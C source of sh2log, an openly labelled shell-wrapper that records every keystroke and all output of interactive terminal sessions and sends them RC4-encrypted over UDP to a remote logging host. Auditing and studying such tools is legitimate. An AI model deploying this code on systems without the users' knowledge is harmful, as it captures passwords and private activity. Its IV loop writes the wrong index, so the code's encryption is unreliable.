/*
 *  The sh2log PTY sniffing program
 *
 *  Copyright (C) 2006  Christophe Devine
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <sys/time.h>
#include <termios.h>
#include <unistd.h>
#include <signal.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <fcntl.h>
#include <netdb.h>
#include <errno.h>
#include <time.h>

#if defined AIX
#else
#if defined LINUX || defined OSF
  #include <pty.h>
#else
#if defined FREEBSD
  #include <libutil.h>
#else
#if defined OPENBSD
  #include <util.h>
#else
#if defined SUNOS || defined HPUX
  #include <sys/stropts.h>
#else
#if ! defined CYGWIN && ! defined IRIX
  #error Undefined host system
#endif
#endif
#endif
#endif
#endif
#endif

#include "config.h"
#include "rc4.h"
#include "sha1.h"

struct connection_data
{
    int server_fd;
    struct sockaddr_in server_addr;
    int nb_pkt_sent;
};

struct session_data
{
    struct timeval tv;  /* packet timestamp     */
    struct winsize ws;  /* current window size  */
    int uid;            /* shell user    id     */
    int pid;            /* shell process id     */
    int dir;            /* 0=from pty, 1=to pty */
    int len;            /* data length          */
    unsigned char buffer[BUFSIZE];
};

/* signal handler */

int got_sigwinch;
int got_sigchld;

void sighandler( int signum )
{
    if( signum == SIGWINCH )
    {
        got_sigwinch = 1;
        signal( signum, sighandler );
    }
    if( signum == SIGCHLD  )
    {
        got_sigchld  = 1;
    }
}

/*
 * Encrypted packet format:
 *
 *
 *   0   - 15        RC4 initialization vector
 *  -----------------------------------------}
 *  16   - 23        gettimeofday()          |
 *  24   - 25        real user id            |
 *  26   - 27        shell process id        |
 *  28   - 31        current window size     |  RC4-encrypted data
 *  32   - 32        direction (0=in,1=out)  |
 *  33   - 33+n-1    message contents        |
 *  33+n - 33+n+20   SHA-1 control sum       |
 *  -----------------------------------------}
 *
 *  The RC4 IV and the secret key are hashed together with SHA-1
 *  to produce a per-packet RC4 encryption/decryption key.
 *
 *  Packets are splitted into 512-byte blocks to avoid IP fragments.
 */

void encrypt_n_send( struct connection_data *cd,
                     struct session_data *sd )
{
    int i, j, len;
    sha1_context sha1;
    struct rc4_state rc4;
    unsigned char pktkey[32];
    unsigned char msg[BUFSIZE + 64];

    for( i = 0; i < sd->len; i += 512 )
    {
        len = ( sd->len - i > 512 )
            ? 512 : sd->len - i;

        /* setup a new RC4 IV */

        for( j = 0; j < 16; j++ )
            msg[i] = rand() & 0xFF;

        /* append the packet header */

        msg[16] = ( sd->tv.tv_sec        ) & 0xFF;   
        msg[17] = ( sd->tv.tv_sec  >>  8 ) & 0xFF;   
        msg[18] = ( sd->tv.tv_sec  >> 16 ) & 0xFF;   
        msg[19] = ( sd->tv.tv_sec  >> 24 ) & 0xFF;   

        msg[20] = ( sd->tv.tv_usec       ) & 0xFF;   
        msg[21] = ( sd->tv.tv_usec >>  8 ) & 0xFF;   
        msg[22] = ( sd->tv.tv_usec >> 16 ) & 0xFF;   
        msg[23] = ( sd->tv.tv_usec >> 24 ) & 0xFF;   

        msg[24] = ( sd->uid       ) & 0xFF;
        msg[25] = ( sd->uid >> 8  ) & 0xFF;
        msg[26] = ( sd->pid       ) & 0xFF;
        msg[27] = ( sd->pid >> 8  ) & 0xFF;

        msg[28] = ( sd->ws.ws_row      ) & 0xFF;
        msg[29] = ( sd->ws.ws_row >> 8 ) & 0xFF;
        msg[30] = ( sd->ws.ws_col      ) & 0xFF;
        msg[31] = ( sd->ws.ws_col >> 8 ) & 0xFF;

        msg[32] = sd->dir;

        memcpy( msg + 33, &sd->buffer[i], len );

        sha1_starts( &sha1 );
        sha1_update( &sha1, msg + 16,  17 + len );
        sha1_finish( &sha1, msg + 16 + 17 + len );

        /* setup the per-packet RC4 key */

        memcpy( pktkey,   secret, 16 );
        memcpy( pktkey + 16, msg, 16 );

        sha1_starts( &sha1 );
        sha1_update( &sha1, pktkey, 32 );
        sha1_finish( &sha1, pktkey );

        /* encrypt and send the buffer */

        rc4_setup( &rc4, pktkey, 20 );
        rc4_crypt( &rc4, msg + 16, 17 + len + 20 );

        sendto( cd->server_fd, msg, 16 + 17 + len + 20, 0,
                (struct sockaddr *) &cd->server_addr,
                sizeof( cd->server_addr ) );

        cd->nb_pkt_sent++;
    }
}

int main( int argc, char *argv[] )
{
    int i, n, pty, tty;
    char real_shell[256], *slave;
    struct termios tattr, tbttr;
    struct connection_data cd;
    struct session_data sd;
    fd_set rd;

    cd.server_fd = pty = tty = -1;

    /* reconstruct the original shell location */

    for( i = strlen( argv[0] ) - 1; i >= 0; i-- )
        if( argv[0][i] == '/' )
            break;

    if( i < 0 && argv[0][0] == '-' )
        i++;

    strcpy( real_shell, REAL_SHELL_DIR );

    n = strlen( REAL_SHELL_DIR );

    if( real_shell[n - 1] != '/' )
    {
        n++;
        real_shell[n - 1] = '/';
    }

    strcpy( real_shell + n, &argv[0][i + 1] );

    /* skip non-interactive shell sessions */

    if( isatty( 0 ) == 0 ||
        isatty( 1 ) == 0 ||
        isatty( 2 ) == 0 ||
        getlogin() == NULL )
        goto exec_real_shell;

    /* create the UDP socket */

    n = argc;

    if( ( cd.server_fd = socket( AF_INET, SOCK_DGRAM, IPPROTO_UDP ) ) < 0 )
        goto exec_real_shell;

    cd.server_addr.sin_family = AF_INET;
    cd.server_addr.sin_port   = htons( SERVER_PORT );
    inet_aton( CONNECT_IP, &cd.server_addr.sin_addr );

    cd.nb_pkt_sent = 0;

    /* create a pseudo-terminal */

#if defined AIX

    if( ( pty = open( "/dev/ptc", O_RDWR | O_NOCTTY ) ) == -1 )
        goto exec_real_shell;

    if( ( slave = ttyname( pty ) ) == NULL )
        goto exec_real_shell;

    if( ( tty = open( slave, O_RDWR | O_NOCTTY ) ) == -1 )
        goto exec_real_shell;

#else
#if defined LINUX || defined FREEBSD || defined OPENBSD || defined OSF

    if( openpty( &pty, &tty, NULL, NULL, NULL ) < 0 )
        goto exec_real_shell;

    slave = ttyname( tty );

    if( slave == NULL )
        goto exec_real_shell;

#else
#if defined IRIX

    slave = _getpty( &pty, O_RDWR, 0622, 0 );

    if( slave == NULL )
        goto exec_real_shell;

    tty = open( slave, O_RDWR | O_NOCTTY );

    if( tty < 0 )
        goto exec_real_shell;

#else
#if defined CYGWIN || defined SUNOS || defined HPUX

    pty = open( "/dev/ptmx", O_RDWR | O_NOCTTY );

    if( pty < 0 )
        goto exec_real_shell;

    if( grantpt( pty ) < 0 )
        goto exec_real_shell;

    if( unlockpt( pty ) < 0 )
        goto exec_real_shell;

    slave = ptsname( pty );

    if( slave == NULL )
        goto exec_real_shell;

    tty = open( slave, O_RDWR | O_NOCTTY );

    if( tty < 0 )
        goto exec_real_shell;

#if defined SUNOS || defined HPUX

    if( ioctl( tty, I_PUSH, "ptem" ) < 0 )
        goto exec_real_shell;

    if( ioctl( tty, I_PUSH, "ldterm" ) < 0 )
        goto exec_real_shell;

#if defined SUNOS

    if( ioctl( tty, I_PUSH, "ttcompat" ) < 0 )
        goto exec_real_shell;

#endif
#endif
#endif
#endif
#endif
#endif

    /* copy the terminal attributes and set stdin in RAW mode */

    if( tcgetattr( 0, &tattr ) == 0 )
    {
        memcpy( &tbttr, &tattr, sizeof( tattr ) );

        tcsetattr( tty, TCSANOW, &tattr );

        tbttr.c_iflag |= IGNPAR;
        tbttr.c_iflag &= ~(ISTRIP|INLCR|IGNCR|ICRNL|IXON|IXANY|IXOFF);
        tbttr.c_lflag &= ~(ISIG|ICANON|ECHO|ECHOE|ECHOK|ECHONL|IEXTEN);
        tbttr.c_oflag &= ~OPOST;

        tbttr.c_cc[VMIN]  = 1;
        tbttr.c_cc[VTIME] = 0;

        tcsetattr( 0, TCSANOW, &tbttr );
    }

    /* setup the window size */

    ioctl(   0, TIOCGWINSZ, &sd.ws );
    ioctl( pty, TIOCSWINSZ, &sd.ws );

    /* handle window resizing and child exit */

    got_sigwinch = 0;
    got_sigchld  = 0;

    signal( SIGWINCH, sighandler );
    signal( SIGCHLD,  sighandler );

    /* fork to exec the original shell */

    if( ( sd.pid = fork() ) < 0 )
    {
        tcsetattr( 0, TCSANOW, &tattr );
        goto exec_real_shell;
    }

    if( sd.pid == 0 )
    {
        int slave_fd;

        /* set controlling tty */

        setsid();

#if defined LINUX || defined FREEBSD || defined OPENBSD || defined OSF

        slave_fd = -1;
        ioctl( tty, TIOCSCTTY, NULL );

#else
#if defined AIX || defined CYGWIN || defined SUNOS || defined IRIX || defined HPUX

        if( ( slave_fd = open( slave, O_RDWR ) ) >= 0 )
        {
            close( tty );
            tty = slave_fd;
        }

#endif
#endif

        /* tty becomes stdin, stdout, stderr */

        if( tty != 0 ) { close( 0 ); dup2( tty, 0 ); }
        if( tty != 1 ) { close( 1 ); dup2( tty, 1 ); }
        if( tty != 2 ) { close( 2 ); dup2( tty, 2 ); }

        if( pty > 2 ) close( pty );
        if( tty > 2 ) close( tty );

        close( cd.server_fd );

        usleep( 50000 );
        execv( real_shell, argv );
        tcsetattr( 0, TCSANOW, &tattr );
        exit( 1 );
    }

    /* master side */

    srand( time( NULL ) );
    sd.uid = getuid();

    while( 1 )
    {
        FD_ZERO( &rd );
        FD_SET( pty, &rd );
        FD_SET(   0, &rd );

        n = ( pty > 0 ) ? pty : 0;

        if( ( n = select( n + 1, &rd, NULL, NULL, NULL ) ) < 0 )
        {
            if( n < 0 && ( errno == EINTR || errno == EAGAIN ) )
                goto check_sigs;

            break;
        }

        gettimeofday( &sd.tv, NULL );

        if( FD_ISSET( 0, &rd ) )
        {
            /* transfer the data from stdin to pty */

            if( ( n = read( 0, sd.buffer, BUFSIZE ) ) <= 0 )
            {
                if( n < 0 && ( errno == EINTR || errno == EAGAIN ) )
                    goto check_sigs;

                break;
            }

            sd.dir = 0;
            sd.len = n;
            encrypt_n_send( &cd, &sd );

            if( ( n = write( pty, sd.buffer, n ) ) != n )
            {
                if( n < 0 && ( errno == EINTR || errno == EAGAIN ) )
                    goto check_sigs;

                break;
            }
        }

        if( FD_ISSET( pty, &rd ) )
        {
            /* transfer the data from pty to stdin */

            if( ( n = read( pty, sd.buffer, BUFSIZE ) ) <= 0 )
            {
                if( n < 0 && ( errno == EINTR || errno == EAGAIN ) )
                    goto check_sigs;

                break;
            }

            sd.dir = 1;
            sd.len = n;
            encrypt_n_send( &cd, &sd );

            if( ( n = write( 1, sd.buffer, n ) ) != n )
            {
                if( n < 0 && ( errno == EINTR || errno == EAGAIN ) )
                    goto check_sigs;

                break;
            }
        }

check_sigs:

        if( got_sigchld  == 1 )
        {
            got_sigchld  = 0;
            break;
        }

        if( got_sigwinch == 1 )
        {
            /* setup the new window size */

            got_sigwinch = 0;
            ioctl(   0, TIOCGWINSZ, &sd.ws );
            ioctl( pty, TIOCSWINSZ, &sd.ws );
            kill( sd.pid, SIGWINCH );
        }
    }

    /* send closing packet */

    if( cd.nb_pkt_sent > 0 )
    {
        gettimeofday( &sd.tv, NULL );

        sd.ws.ws_row = 0;
        sd.ws.ws_col = 0;

        sd.dir = 0;
        sd.len = 1;
        sd.buffer[0] = '\r';

        encrypt_n_send( &cd, &sd );
    }

    /* cleanup and exit */

    if( tty >= 0 )
        close( tty );

    if( pty >= 0 )
        close( pty );

    if( cd.server_fd >= 0 )
        close( cd.server_fd );

    tcsetattr( 0, TCSANOW, &tattr );
    do { usleep( 10000 ); waitpid( sd.pid, &n, 0 ); } while( ! WIFEXITED( n ) );
    exit( WEXITSTATUS( n ) );

exec_real_shell:

    if( tty >= 0 )
        close( tty );

    if( pty >= 0 )
        close( pty );

    if( cd.server_fd >= 0 )
        close( cd.server_fd );

    execv( real_shell, argv );
    exit( 1 );
}
